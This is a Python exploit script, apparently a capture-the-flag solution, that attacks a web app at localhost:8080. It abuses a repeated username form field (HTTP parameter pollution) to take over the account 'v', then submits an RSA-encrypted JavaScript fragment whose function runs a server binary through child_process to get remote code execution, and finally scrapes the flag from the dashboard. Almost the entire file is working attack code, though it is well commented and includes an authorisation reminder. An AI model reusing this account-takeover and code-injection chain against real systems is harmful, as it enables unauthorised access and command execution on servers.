import sys
import requests
import string
import random
import base64
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
def randomString(length = 16):
    """Return `length` random alphanumeric characters (default 16).

    The result is only used to make a throwaway username unique between
    runs, so the non-cryptographic `random` module is acceptable here.
    Do not reuse this helper for tokens, passwords or anything an
    attacker must not be able to predict -- use `secrets` for that.
    """
    alphabet = string.digits + string.ascii_letters
    picks = [random.choice(alphabet) for _ in range(length)]
    return "".join(picks)
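def encryptWithRsa(keyString, text):
    """RSA-encrypt `text` under the PEM public key in `keyString`.

    Returns the ciphertext base64-encoded: a `str` on Python 3, a byte
    string on Python 2 (where `str` already is bytes), i.e. exactly the
    form-field value the target expects.

    `text` may be a `str` (UTF-8 encoded before encryption) or, on
    Python 3, already `bytes`; the original only accepted `str`.

    Notes for reviewers:
      * Padding is PKCS#1 v1.5 because that is what the target decrypts
        with. It is not a scheme to copy into new code: OAEP is the
        modern choice, and v1.5 decryption oracles are a known risk on
        the *server* side, not something this client can mitigate.
      * PKCS#1 v1.5 can encrypt at most `k - 11` bytes for a `k`-byte
        modulus (245 bytes for RSA-2048). PyCryptodome raises
        `ValueError` for longer plaintexts; that is allowed to propagate
        rather than silently truncating the payload.
    """
    key = RSA.importKey(keyString)
    cipher = PKCS1_v1_5.new(key)
    # Use the structured version tuple instead of string-slicing
    # `sys.version`, which is a fragile way to detect the major version.
    if sys.version_info[0] < 3:
        # Python 2: `str` is already a byte string.
        return base64.b64encode(cipher.encrypt(text))
    if isinstance(text, str):
        text = text.encode("utf8")
    return base64.b64encode(cipher.encrypt(text)).decode("ascii")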
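def main(argv):
    """Run the exploit chain against the target and print the flag.

    Usage: `python exploit.py [BASE_URL]`. BASE_URL defaults to
    `http://localhost:8080`, the value the script originally hard-coded.

    Steps, as performed by the original script:
      1. Register with a *repeated* `username` form field (HTTP parameter
         pollution) so the server receives an array instead of a string.
         Per the original author's comment this lets the new account take
         over the existing user "v"; the server-side mix-up that makes
         this work is not visible from the client and is assumed here.
      2. Log in as "v" with the password just set.
      3. Submit a "request" whose body is RSA-encrypted for the server.
         The plaintext is a fragment of what looks like a JavaScript
         object literal that the server presumably evaluates, so the
         `message` value is an IIFE that runs `/usr/bin/get_flag` via
         `child_process` -- i.e. server-side code execution is the goal.
      4. List the dashboard, open the first request link (assumed to be
         the one just created) and scrape anything starting with `flag_`
         out of the HTML.

    Only run this against a target you are authorised to test.
    """
    # Target base URL: first CLI argument if given, else the original default.
    baseUrl = argv[1].rstrip("/") if len(argv) > 1 else "http://localhost:8080"

    # The server's RSA-2048 public key, as shipped with the target.
    # PEM lines are kept at column 0 so the string content is exact.
    key = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA7Aw1Zin9eJUsrSyV0jSn
XwmevusOEPyW9C4BN1FtQ2VKfb98e+2lcrXP7W0+Mk7Ck93PAc0tPinsj79YBgLK
W/J31zDsPcpAEXbrH8R6rfHRGZWH/12aMPGl9/329GEpWzl/RLe2REqnNNn6PYxK
1Zms3If3meQ60g9JcOmGb9+lUOqa4bFtX8AUvU4oLp/sqRIp7ABAw/pqAbWV6TON
j1rFZlic1lh8ClUG1cbsP9ysx2TIjZo6DQ6BIzPUbPlwLVxG+wQJmhWzGHcEEteV
r8PIxBUw5QsySN5FbyTaiTlp0Usi+3wJOpgb+xrw9EQWcOXZiaZshxKaMT33ssys
qQIDAQAB
-----END PUBLIC KEY-----"""

    # One session keeps the login cookie for the later requests.
    session = requests.Session()

    # 1. Register. `username` is sent twice so the server receives an
    #    array: the first element is the victim account "v", the second a
    #    throwaway value so the registration itself does not collide.
    #    A list of tuples preserves field order on every Python version
    #    and lets `requests` form-encode and set Content-Type itself.
    session.post(
        baseUrl + "/users/register",
        data=[
            ("username", "v"),
            ("username", randomString(32)),
            ("password", "a"),
            ("passwordConfirm", "a"),
        ],
    )

    # 2. Log in as the hijacked account "v".
    session.post(
        baseUrl + "/users/login",
        data=[("username", "v"), ("password", "a")],
    )

    # 3. Create a request for "v". The plaintext (split only for line
    #    length; the bytes are unchanged) is a JS object-literal fragment
    #    whose `message` runs the flag binary on the server.
    payload = (
        '"message": (() => require("child_process")'
        '.execSync("/usr/bin/get_flag").toString())(), '
        '"tags": ["you", "got", "hacked"]'
    )
    encrypted = encryptWithRsa(key, payload)
    # Letting `requests` encode the base64 value handles '+', '/' and '='
    # correctly, replacing the hand-rolled replace('+', '%2B') the script
    # used before, which left '/' and '=' to luck.
    session.post(
        baseUrl + "/dashboard/request/v",
        data={"data": encrypted},
    )

    # 4. Find the request we just created on the dashboard. Guard the
    #    lookup: if registration or login failed there is no link and the
    #    original indexing would have died with an IndexError.
    listing = session.get(baseUrl + "/dashboard").text
    marker = "/dashboard/view/"
    if marker not in listing:
        print("No request found on the dashboard (registration or login probably failed)...")
        return
    request_id = listing.split(marker)[1].split('"')[0]

    page = session.get(baseUrl + "/dashboard/view/" + request_id).text
    # If the command ran, its output is rendered somewhere in the HTML;
    # take everything from `flag_` up to the next tag.
    if "flag_" not in page:
        print("No flag found...")
        return
    print("flag_" + page.replace("\n", "").split("flag_")[1].split("<")[0])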
if __name__ == "__main__":
    # Script entry point: hand the raw command line to main().
    main(sys.argv)